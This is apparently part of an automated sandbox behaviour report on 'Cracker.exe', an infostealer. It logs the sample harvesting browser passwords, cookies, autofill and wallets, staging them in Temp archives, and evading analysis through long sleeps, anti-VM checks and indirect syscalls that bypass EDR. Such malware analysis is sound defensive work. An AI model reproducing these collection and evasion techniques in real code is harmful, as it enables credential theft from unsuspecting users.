      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2680Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3445Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exe TID: 7532Thread sleep time: -35000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep count: 2680 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep count: 3445 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
      Source: C:\Users\user\Desktop\Cracker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Users\user\Desktop\Cracker.exeThread delayed: delay time: 35000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
      Source: Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP9
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Users\user\Desktop\Cracker.exeNtWriteFile: Indirect: 0x7FF67AC1DB77Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeNtReadFile: Indirect: 0x7FF67AC252C7Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\Cracker.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.mp3 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.mp3 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.mp3 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\NEBFQQYWPS.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\NEBFQQYWPS.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\NEBFQQYWPS.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\NEBFQQYWPS.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.mp3 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\PIVFAGEAAV.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\PIVFAGEAAV.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\PWCCAWLGRE.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\PWCCAWLGRE.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.mp3 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.mp3 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\ZQIXMVQGAH.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\ZQIXMVQGAH.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\Documents\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\screen1.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\sensitive-files.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\user_info.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\user_info.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Wallets VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Edge_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Edge_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Chrome_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Chrome_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Edge_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Edge_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Edge_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Edge_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill\Edge_Default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
